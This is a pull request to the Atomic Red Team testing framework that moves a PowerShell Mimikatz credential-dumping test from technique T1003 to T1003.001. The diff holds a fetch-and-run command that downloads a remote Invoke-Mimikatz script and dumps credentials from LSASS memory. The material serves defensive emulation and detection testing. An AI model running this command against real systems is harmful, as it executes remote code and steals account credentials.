### PR TITLE
Moving Invoke-Mimikatz test to T1003.001

### DIFF
--- a/atomics/T1003.001/T1003.001.yaml
+++ b/atomics/T1003.001/T1003.001.yaml
@@ -297,3 +297,22 @@ atomic_tests:
       del "#{output_file}" >nul 2> nul
     name: command_prompt
     elevation_required: true
+- name: Powershell Mimikatz
+  auto_generated_guid: 66fb0bc1-3c3f-47e9-a298-550ecfefacbc
+  description: |
+    Dumps credentials from memory via Powershell by invoking a remote mimikatz script.
+    If Mimikatz runs successfully you will see several usernames and hashes output to the screen.
+    Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution. 
+    Or, if you try to run the test without the required administrative privleges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA"
+  supported_platforms:
+  - windows
+  input_arguments:
+    remote_script:
+      description: URL to a remote Mimikatz script that dumps credentials
+      type: Url
+      default: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1
+  executor:
+    command: |
+      IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
+    name: powershell
+    elevation_required: true

--- a/atomics/T1003/T1003.yaml
+++ b/atomics/T1003/T1003.yaml
@@ -1,25 +1,6 @@
 attack_technique: T1003
 display_name: OS Credential Dumping
 atomic_tests:
-- name: Powershell Mimikatz
-  auto_generated_guid: 66fb0bc1-3c3f-47e9-a298-550ecfefacbc
-  description: |
-    Dumps credentials from memory via Powershell by invoking a remote mimikatz script.
-    If Mimikatz runs successfully you will see several usernames and hashes output to the screen.
-    Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution. 
-    Or, if you try to run the test without the required administrative privleges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA"
-  supported_platforms:
-  - windows
-  input_arguments:
-    remote_script:
-      description: URL to a remote Mimikatz script that dumps credentials
-      type: Url
-      default: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1
-  executor:
-    command: |
-      IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
-    name: powershell
-    elevation_required: true
 
 - name: Gsecdump
   auto_generated_guid: 96345bfc-8ae7-4b6a-80b7-223200f24ef9


### PR DESCRIPTION
**Details:**
Based on a discussion with Jannik in the Atomic Red Team Slack, we determined that the Invoke-Mimikatz test that was in [`T1003`](https://attack.mitre.org/techniques/T1003/) belongs in [`T1003.001 - OS Credential Dumping: LSASS Memory`](https://attack.mitre.org/techniques/T1003/001/). I confirmed in the Mimikatz source code that `Invoke-Mimikatz -DumpCreds` calls [`SEKURLSA::LogonPasswords`](https://adsecurity.org/?page_id=1821#SEKURLSALogonPasswords) in Mimikatz which [performs operations specifically on LSASS](https://github.com/gentilkiwi/mimikatz/blob/fe4e98405589e96ed6de5e05ce3c872f8108c0a0/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c#L290-L378).

**Testing:**
This test has no external dependencies so no testing was performed.

**Associated Issues:**
None